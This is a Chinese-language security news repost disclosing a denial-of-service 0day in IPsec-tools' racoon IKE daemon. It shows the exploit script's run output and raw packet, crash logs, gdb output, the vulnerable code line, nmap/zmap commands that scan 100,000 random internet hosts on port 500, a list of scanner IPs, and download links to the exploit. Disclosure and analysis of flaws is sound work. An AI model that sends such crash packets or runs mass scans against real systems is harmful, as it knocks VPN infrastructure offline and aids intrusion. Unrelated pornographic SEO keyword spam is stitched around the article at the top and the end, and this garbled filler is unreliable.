精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

IPsec Tools拒絕服務0day漏洞詳細報告(附0day)

安全 漏洞
IPsec-tools近日曝出拒絕服務0day漏洞,并且互聯網上已經出現利用程序。你可能質疑該漏洞甚至未達到中等漏洞的評級,但請記住IPsec是至關重要的基礎設施,并且這種攻擊只需要兩個小的UDP數據包。

IPsec-tools近日曝出拒絕服務0day漏洞,并且互聯網上已經出現利用程序。你可能質疑該漏洞甚至未達到中等漏洞的評級,但請記住IPsec是至關重要的基礎設施,并且這種攻擊只需要兩個小的UDP數據包。如果有打開日志記錄或者用戶經常斷開或重新連接那么就很容易被發現,它可能會創建Intrusion Detection/Prevention (IDP)簽名,更多的是,你可能需要運行一個蜜罐來進行檢測。

IPsec Tools拒絕服務0day漏洞詳細報告(附0day)

如果你有使用IPsec-tools,明智的做法就是盡快替換它。

什么是IPsec

IPsec是一款用于關鍵基礎設施的軟件。它改進IP棧,這樣IP層以下的所有協議都可以進行加密(TCP, UDP等等)。其通常被描述為VPN,同時也是VPN的一部分,但不要搞混淆IPsec到底是做什么的。

IPsec試圖提供的特性:

加密(可選)
身份驗證(可選)
保密性
完整性
可用性?

Demo:附在文末

用法:

python3 repro_racoon_dos129.py
Warning: Unable to bind to port 500. Might not work. [Errno 13] Permission denied
Umm, okay.129 ('\x81\xcf{r\x8e\xb6a\xdd9\xf1\x87cP\xb1\x05\xc7\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x00\x98\r\x00\x00<\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x000\x01\x01\x00\x01\x00\x00\x00(\x01\x01\x00\x00\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x01Q\x80\x80\x01\x00\x07\x80\x0e\x01\x00\x80\x03\x00\x03\x80\x02\x00\x02\x80\x04\x00\x05\r\x00\x00\x14J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/\r\x00\x00\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00\x00\x00\x00\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80\x00\x00\x00', ('192.168.88.247', 500))129 sending second packet
Umm, okay.

服務器崩潰:

sudo racoon -F -v -f server_racoon.conf >server_dos5m.txt 2>&1 &
jvoss@ipsecu:~$ dmesg |tail
[  584.440533] AVX or AES-NI instructions are not detected.
[  584.442253] AVX or AES-NI instructions are not detected.
[  584.490468] AVX instructions are not detected.
[13683.867215] init: upstart-udev-bridge main process (361) terminated with status 1
[13683.867223] init: upstart-udev-bridge main process ended, respawning
[13683.867307] init: upstart-file-bridge main process (452) terminated with status 1
[13683.867313] init: upstart-file-bridge main process ended, respawning
[13683.867386] init: upstart-socket-bridge main process (616) terminated with status 1
[13683.867392] init: upstart-socket-bridge main process ended, respawning
[19912.460170] racoon[3701]: segfault at 100 ip 00007fe0eba84ce7 sp 00007ffff51db730 error 4 in racoon[7fe0eba5e000+93000]
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
2015-04-27 15:22:14: [169.254.44.43] ERROR: ignore the packet, received unexpecting payload type 128.
2015-04-27 15:22:14: INFO: respond new phase 1 negotiation: 169.254.88.251[500]<=>169.254.44.43[42258]
2015-04-27 15:22:14: INFO: begin Identity Protection mode.
2015-04-27 15:22:14: INFO: received Vendor ID: RFC 3947
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02
2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00
2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION
2015-04-27 15:22:14: INFO: received Vendor ID: DPD
2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947
Program received signal SIGSEGV, Segmentation fault.
0x000055555557ace7 in ?? ()
(gdb) bt
#0  0x000055555557ace7 in ?? ()
#1  0x000055555557b775 in ?? ()
#2  0x000055555556c1a1 in ?? ()
#3  0x0000555555563fd1 in ?? ()
#4  0x00005555555658ec in ?? ()
#5  0x000055555555fc9d in ?? ()
#6  0x000055555555f273 in ?? ()
#7  0x00007ffff6953ec5 in __libc_start_main (main=0x55555555f010, argc=5, argv=0x7fffffffe738, init=<optimized out>, 
    fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe728) at libc-start.c:287
#8  0x000055555555f3ec in ?? ()
(gdb) x/15i $rip - 12
   0x55555557acdb:      mov    %eax,0x1c8(%rsp)
   0x55555557ace2:      mov    0x28(%r12),%rax
=> 0x55555557ace7:      mov    0x100(%rax),%rax
   0x55555557acee:      mov    0x30(%rax),%rax
   0x55555557acf2:      test   %rax,%rax
   0x55555557acf5:      je     0x55555557af00
   0x55555557acfb:      mov    (%rax),%rdx
   0x55555557acfe:      lea    0x20(%rsp),%r13
   0x55555557ad03:      mov    0x8(%rax),%rax
   0x55555557ad07:      lea    0x1c(%rsp),%rbx
   0x55555557ad0c:      lea    0x30(%rsp),%rsi
   0x55555557ad11:      mov    %r13,%rcx
   0x55555557ad14:      mov    %rdx,0x30(%rsp)
   0x55555557ad19:      mov    %rbx,%rdi
   0x55555557ad1c:      xor    %edx,%edx
(gdb) i r
rax            0x0      0
rbx            0x0      0
rcx            0x5555558dbe40   93824995933760
rdx            0x5555558dbe40   93824995933760
rsi            0x0      0
rdi            0x5555558dbdc0   93824995933632
rbp            0x5555558dbdc0   0x5555558dbdc0
rsp            0x7fffffffd180   0x7fffffffd180
r8             0x5555558dbdc0   93824995933632
r9             0x7ffff6cf07b8   140737334151096
r10            0xbdb00  776960
r11            0x5555558da301   93824995926785
r12            0x5555558da300   93824995926784
r13            0x555555822460   93824995173472
r14            0x5555558da420   93824995927072
r15            0x7fffffffd260   140737488343648
rip            0x55555557ace7   0x55555557ace7
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

#p#

不使用IPsec

IPsec有許多易受到攻擊的操作模式,你可以從他的配置中看出來。

不要使用預共享密鑰
不使用防火墻阻止攻擊者橋接你的網絡
不要讓個人或者沒有IT主管的公司橋接你的網絡
不要使用IPsec代替TLS
不要使用IPsec防止0-day
如果你沒有一個能干的IT人,不要運行它
不要購買一個沒有更新的IPsec設備軟件
....

如果NSA想要獲取你的所有數據,那么他們完全有這個能力。

IPsec Tools拒絕服務0day漏洞詳細報告(附0day)

關于漏洞

漏洞位置:

if (iph1->rmconf->proposal->gssid != NULL) {

Fuzzer(漏洞檢查工具)好像錯過了什么,黑客們好像也錯過了什么。如果不是我幸運以及堅持,可能我也會錯過些什么東西。

NetBSD, FreeBSD, Android以及其他許多產品都在使用IPsec tools,我認為這就有必要去尋找發掘漏洞。我檢測Makefile文件,在GSSAPI中Android并沒有進行編譯。

IPsec作者沒有回應我們的多次請求,我們也沒有聯系FreeBSD或NetBSD,因為我們沒有花足夠的時間來檢查kame.net。說實話看著NetBSD就蛋疼,我不會花過多的時間來安裝FreeBSD或NetBSD。我的同事在SourceForge已經發布這個漏洞,而我要做的事情就是充分的披露它。

修復一個漏洞需要多久

如果沒有類似的缺陷,修復一個漏洞大概需要1個小時左右,通知使用者卻需要20小時左右。

我不愿意做這樣的事情,這個問題自然有CVE解決。

實在無力吐槽IPsec-tools,如果你是它的死忠粉請不要來黑我。不介意的話我可以再從其中找個漏洞出來,再次公開!

意義何在

當IKE daemon崩潰,可能會導致重新啟動。一旦重新啟動,就給了攻擊者更多嘗試啟動IKE daemon的機會,結果:未知。如果不重新啟動,密鑰不會改變。當重復4次就會喪失其完整性和機密性,重啟又變得很容易了,結果:潛在妥協。

如果系統判斷這兩個設備不應該再使用IPsec,系統會恢復默認狀態,結果:可能完全妥協。

當加密完全被破環,加密層以下就很容易被攻擊者攻破。

IPsec被設計為運行于公共網絡,中間人攻擊也并非只是理論。中間人攻擊經常用在WIFI,公司網絡(平面拓撲結構),服務器(DMZ/segmented),骨干路由器(ISP)

我并沒有在這里危言聳聽。利用該漏洞,單獨一個人來攻擊公司網絡的可能性十分低(一個人至少需要4個小時的時間來嘗試)。NSA攻破伊朗air-gapped網絡并摧毀其離心機,如果他想獲取你所擁有的東西,使用該漏洞簡直輕而易舉!

關于IPsec設計

IPsec協議過于復雜,缺少x.509的靈活性,TLVs的設計是為了減少緩沖區溢出,開發者混淆不清導致出現許多錯誤。IKE daemon經常被設置為root權限,任何的IP數據包都可以瀏覽IPsec,實現IKE客戶端只用了8個小時,實現IKE服務端只用了8個小時。我們為什么需要靈活性?IPsec的作者應該為他自己感到羞愧,他們的思維依舊還活在90年代 。我們為什么還沒有取代IPsec?Bruce Schneier曾公開譴責IPsec,對于IPsec這已經不是什么新鮮事了,但對于IPsec的使用者來說這絕對不是一件好事情。

誰在使用IPsec-tools

IPsec-tools有一個唯一的響應簽名,你可以寫一個Nmap腳本去檢測。以下測試沒有在FreeBSD和NetBSD上進行進行。

你不需要運行

nmap -sU -Pn -n -vvv -iR 100000 -p 500 -oA nmap_ike1

或者

sudo nmap -sU -sV -O -Pn -n -vvv -iR 100000 -p 500 -oA nmap_ike2

再或者

sudo zmap ike

為了尋找一長串IPsec-tools使用者列表,你不需要進行網絡調查,nmap并不能輕松的使用這個exploit尋找漏洞服務器。

IPsec掃描器

目前有很多的IPsec掃描器在掃描使用IPv4協議的IKE服務器。你認為他們這樣做的目的是什么?一些人僅僅只是進行研究,一些人就是純粹的腳本小子,一些人就是為了進行IP地址欺騙攻擊。據我的推測手握0day的他們正在利用這個漏洞攻擊他們所遇到的所有VPN,從他們發送的數據包就可以看得出來。

數量   IP地址

915   92.156.83.10

413   88.182.227.2

379   222.64.125.46

366   202.153.47.42

156   92.139.69.91

146   195.87.244.8

134   2.12.52.14

132   5.107.86.214

115   93.100.141.178

113   212.57.6.226

102   212.21.46.34

98     41.214.10.33

92    114.35.125.229

90    41.136.2.241

90    41.136.18.209

85    79.165.141.243

79    67.68.122.156

79    46.14.13.125

64    124.148.219.105

60    190.199.39.243

59    203.59.158.2

57    95.29.206.187

56    185.56.161.133

56    154.70.115.98

46    41.136.47.233

45    86.235.41.154

43    212.87.172.4

42    89.157.119.185

41    50.189.102.250

幻燈片地址

[https://www.altsci.com/ipsec/ipsecs2a.html]

IPsec-tools 0-day Exploit

[鏈接:http://pan.baidu.com/s/1o6C9mOU 密碼:tfn4]

sig

[鏈接:http://pan.baidu.com/s/1dDo5bo9 密碼:4iki]

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2017-02-07 11:00:26

2009-07-06 13:15:07

2011-08-26 11:44:01

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2021-10-06 13:48:50

0day漏洞攻擊

2022-03-25 13:41:55

漏洞網絡攻擊Quantum(量子

2013-05-24 14:02:42

2022-03-30 09:09:39

漏洞網絡安全網絡攻擊

2020-12-17 10:28:27

漏洞網絡攻擊網絡安全

2021-07-14 17:17:45

0day漏洞惡意代碼

2010-01-20 16:13:15

2011-02-28 09:34:55

2009-09-09 08:54:50

2011-03-15 15:14:22

2010-08-03 09:51:22

2024-07-31 08:46:10

2015-08-31 10:09:34

2010-09-01 15:18:04

2009-05-04 15:58:34

2009-11-29 16:53:17

點贊
收藏

51CTO技術棧公眾號

日本少妇高潮喷水视频| 成人综合色站| 精品在线观看一区| 高清一区二区| 亚洲成人免费在线观看| 麻豆传媒一区二区| 欧美日韩在线视频播放| 99久久夜色精品国产亚洲1000部| 欧美一区二区三区在线电影| 人妻av中文系列| www日韩tube| 国产成人精品一区二区三区四区| 88xx成人精品| 天堂网中文在线观看| 一区二区三区欧洲区| 大桥未久av一区二区三区| 亚洲一区精彩视频| 日本成人动漫在线观看| 另类小说一区二区三区| 久久久女人电视剧免费播放下载| 中文字幕免费高清| 这里视频有精品| 欧美在线短视频| 日韩 欧美 视频| 91在线看黄| www.成人网.com| 成人xxxx视频| 秋霞av一区二区三区| 欧美韩日精品| 色老头一区二区三区| 欧美xxxxx精品| 亚洲伦理久久| 91国产成人在线| 欧美日韩性生活片| 91精选在线| 国产女主播一区| 精品在线视频一区二区| 精品人妻一区二区三区日产乱码| 蜜芽一区二区三区| 青青在线视频一区二区三区| 国产在线观看免费av| 99精品国产一区二区三区| 日韩精品在线影院| 欧美双性人妖o0| 欧美日韩黄色| 欧美日韩激情在线| 99视频在线免费| 欧美私密网站| 亚洲成人你懂的| 亚洲国产一二三精品无码| 午夜在线视频| 国产欧美日韩卡一| 欧美一区二区三区四区夜夜大片 | 91久久精品日日躁夜夜躁国产| 美女又爽又黄免费视频| 日韩亚洲在线| 高清亚洲成在人网站天堂| avove在线播放| 欧美理论在线| 久久久久这里只有精品| 国产第一页在线播放| 欧美视频一区| 久久久久免费精品国产| 日韩av一二三区| 一本一本久久| 日韩av电影在线网| 日本黄色中文字幕| 免费成人小视频| 成人免费视频a| 99在线无码精品入口| 国产91在线观看| 国产伦视频一区二区三区| 天天操天天操天天操| 91香蕉国产在线观看软件| 久久国产欧美精品| 国产高清一级毛片在线不卡| 亚洲国产成人在线| 性生活免费观看视频| 久久www人成免费看片中文| 亚洲mv在线观看| 久草资源站在线观看| 户外露出一区二区三区| 欧美日韩第一区日日骚| 日韩欧美中文在线视频| 国产 日韩 欧美 综合 一区| 日韩av最新在线| 精品人妻互换一区二区三区| 国产成人精品免费视| 中文字幕综合一区| www.av免费| 欧美日韩少妇| 8050国产精品久久久久久| 影音先锋在线国产| 免费观看一级特黄欧美大片| 91精品在线影院| 亚洲爱爱综合网| 成人一级黄色片| 欧美精品人人做人人爱视频| 国产在线观看免费| 最新成人av在线| 亚洲中文字幕无码一区二区三区 | 久久av中文字幕| 在线观看黄网址| 欧美午夜影院| 日韩免费黄色av| 97视频免费在线| 懂色av一区二区三区免费观看| 久久99国产精品99久久| www.亚洲资源| 一区二区三区不卡在线观看 | 人人干在线视频| 亚洲精品亚洲人成人网| 国产成人在线小视频| 免费成人直播| 欧美一级久久久| 国产精品久久不卡| 欧美黄色大片在线观看| 性色av香蕉一区二区| 久久精品国产亚洲av麻豆蜜芽| 国产在线精品视频| 蜜桃av噜噜一区二区三| 免费a级人成a大片在线观看| 亚洲午夜一二三区视频| 日韩无套无码精品| 天堂精品久久久久| 亚洲人在线观看| 久久精品99国产精| 日本不卡在线视频| 国产精品制服诱惑| 日本视频在线播放| 亚洲一区二区三区视频在线播放 | 农村老熟妇乱子伦视频| 亚洲国产网站| 亚洲精品欧美日韩专区| 搞黄视频在线观看| 亚洲成a人在线观看| 日韩av卡一卡二| 亚洲区小说区图片区qvod| 欧美激情a∨在线视频播放| 一级做a爰片久久毛片16| 26uuu另类欧美| 欧美性猛交内射兽交老熟妇| 成人a在线观看高清电影| 日韩精品在线免费播放| 欧美日韩中文字幕在线观看| 免费成人在线观看视频| 日本不卡高清视频一区| 怡红院在线播放| 777xxx欧美| 极品人妻videosss人妻| 国产人成精品一区二区三| 亚洲字幕一区二区| 国产网站在线免费观看| 欧美日韩高清不卡| 337人体粉嫩噜噜噜| 乱人伦精品视频在线观看| 欧美福利一区二区三区| 高清在线视频不卡| 精品国产凹凸成av人导航| 永久久久久久久| 国产在线不卡一区| 99热都是精品| 精品一区二区三区中文字幕在线 | 欧美视频一区二区| 性猛交娇小69hd| 美女日韩在线中文字幕| 久久精品美女| 亚洲一级少妇| 亚洲精品网站在线播放gif| 免费在线看黄网址| av一二三不卡影片| 国产精品宾馆在线精品酒店| 欧美日韩一本| 日本亚洲欧洲色α| 国产小视频免费在线观看| 色猫猫国产区一区二在线视频| 男女黄床上色视频| 麻豆久久婷婷| 神马影院一区二区| 99九九久久| 丝袜美腿亚洲一区二区| 一区二区三区日| 亚洲欧洲日韩av| 丰满少妇中文字幕| 影音先锋久久资源网| 精品无码久久久久国产| 91制片在线观看| 国产一区二区动漫| 国产精品国产av| 一区二区三区色| 欧美精品黑人猛交高潮| 日韩专区中文字幕一区二区| 神马影院午夜我不卡影院| 国产精选久久| 欧美高跟鞋交xxxxhd| 日韩一区免费视频| 日本精品一区二区三区高清| 黄色免费一级视频| 国产成人久久精品77777最新版本| 三上悠亚久久精品| 国产欧美日韩一区二区三区四区| 国产美女精品视频| 91破解版在线观看| 亚洲精品日韩久久久| 国产特级aaaaaa大片| 午夜不卡在线视频| 国产传媒在线看| 国产激情视频一区二区在线观看| 成人午夜精品久久久久久久蜜臀| 国产成人精品三级高清久久91| 成人亲热视频网站| 国产一二在线播放| 久久夜精品va视频免费观看| 天天干,夜夜爽| 欧美日韩不卡一区二区| xxxx 国产| 国产精品视频yy9299一区| 日本特黄在线观看| 老妇喷水一区二区三区| 中文字幕日韩一区二区三区不卡| 日韩欧美国产大片| 91影视免费在线观看| 三级在线观看视频| 久久久精品日本| 欧美日韩伦理片| 日韩一级片网址| 国产字幕在线观看| 一级中文字幕一区二区| 亚洲女人毛茸茸高潮| 91在线播放网址| 红桃视频一区二区三区免费| 六月丁香综合| 欧美精品久久久久久久自慰| 91精品啪在线观看国产81旧版| 久久久久久久久久码影片| 亚洲一区二区小说| 国产日韩欧美在线| 日韩免费电影| 91av在线网站| 午夜在线激情影院| x99av成人免费| 成年人视频免费在线观看| 亚洲国产精品推荐| 丰满人妻一区二区三区免费视频 | 久久人体大胆视频| 国产永久免费高清在线观看视频| 精品国产区一区| 国模无码一区二区三区| 在线不卡a资源高清| 亚洲视屏在线观看| 日韩欧美精品网站| 国产一级做a爱片久久毛片a| 亚洲一区国产视频| 日本黄色小说视频| 国产精品久久久久久久久免费桃花 | 午夜欧美理论片| 最新av在线免费观看| 偷拍欧美精品| 影音先锋亚洲视频| 天天操综合网| 五月天综合婷婷| 亚洲综合色站| 无码毛片aaa在线| 天天综合亚洲| 一本久道久久综合狠狠爱亚洲精品| 久久av免费| 亚洲欧美电影在线观看| 爽成人777777婷婷| 综合久久国产| 亚洲最新av| 青青草综合视频| 午夜天堂精品久久久久| 日韩在线观看a| 最新国产乱人伦偷精品免费网站| 精品少妇在线视频| 麻豆亚洲精品| 精品亚洲视频在线| 国产精品一区二区视频| 中文字幕1区2区| 成人精品视频一区| 中文字字幕码一二三区| 国产无一区二区| 欧美多人猛交狂配| 亚洲视频一二三区| 国产亚洲第一页| 午夜精品久久久久久久蜜桃app| 六月丁香在线视频| 色先锋aa成人| 中文字幕自拍偷拍| 91精品国产综合久久精品图片| 亚洲精品一区二区三区新线路| 亚洲国产私拍精品国模在线观看| 你懂的视频在线播放| 中文字幕亚洲欧美在线| 超碰电影在线播放| 97人人模人人爽人人喊中文字| 黄色小说在线播放| 国产精品永久免费| 日韩影片在线观看| 麻豆av一区二区三区久久| 99精品美女| 国产盗摄视频在线观看| 亚洲三级毛片| 午夜免费看视频| 成人avav影音| 极品尤物一区二区| 亚洲超碰97人人做人人爱| 欧美日韩在线视频播放| 亚洲电影在线看| 1769视频在线播放免费观看| 欧美福利在线观看| 国产 日韩 欧美一区| wwwxx欧美| 青青一区二区| 久久人妻无码一区二区| 久久精品亚洲| 久久无码专区国产精品s| 久久精品亚洲精品国产欧美| 在线观看成人毛片| 高跟丝袜一区二区三区| 97人妻精品一区二区三区| 精品国精品国产尤物美女| 春暖花开成人亚洲区| 午夜精品久久久久久久久久久久| 性欧美1819sex性高清| 精品欧美日韩在线| 自拍视频亚洲| 国产精品igao| 97国产精品videossex| 少妇被躁爽到高潮无码文| 欧美亚洲国产怡红院影院| 天堂网av2014| 欧美成人中文字幕在线| 韩日一区二区| 欧美精品一区在线| 亚洲伦理一区| av av在线| 亚洲日本成人在线观看| 波多野结衣人妻| 亚洲精品中文字幕av| 成年人视频免费在线播放| 国产精品99免视看9| 一区二区三区日本久久久| 国产人妻777人伦精品hd| 国产一区二区不卡| 日本不卡一区视频| 欧美在线观看你懂的| 99riav在线| 国产精品久久久精品| 国产免费播放一区二区| 日韩欧美视频网站| 成人黄色a**站在线观看| 五月天av网站| 欧美一区二区三区在线观看| www.久久ai| 亚洲jizzjizz日本少妇| 久久免费大视频| 亚洲天堂伊人网| 亚洲欧美怡红院| 国产精品-色哟哟| 久久精彩免费视频| 亚洲精品777| 国产成人亚洲综合无码| 国产91精品露脸国语对白| 久久久久亚洲AV成人| 日韩欧美国产电影| 日本孕妇大胆孕交无码| 国产不卡一区二区在线观看| 国模大胆一区二区三区| 国产不卡一二三| 精品国产户外野外| 涩涩视频在线观看免费| 国产精品成人一区二区| 日本一本不卡| 在线看免费毛片| 亚洲狼人国产精品| 亚洲第一第二区| 日本一区二区不卡| 成人黄色av| 国产永久免费网站| 亚洲综合成人网| 囯产精品久久久久久| 日韩av片永久免费网站| 青青草国产免费一区二区下载| 在线黄色免费看| 亚洲黄色小说网站| 亚洲va欧美va| 国产精品久久久久久久久久久久久| 日韩欧美网站| 人妻精品久久久久中文字幕69| 亚洲国产成人tv| 国产网站在线播放| 91中文字幕一区| 91久久久久| 国产午夜福利一区| 日韩欧美国产综合在线一区二区三区| av电影在线地址| 亚洲国产一区二区三区在线| 精品一区二区免费在线观看| 久久久精品视频在线|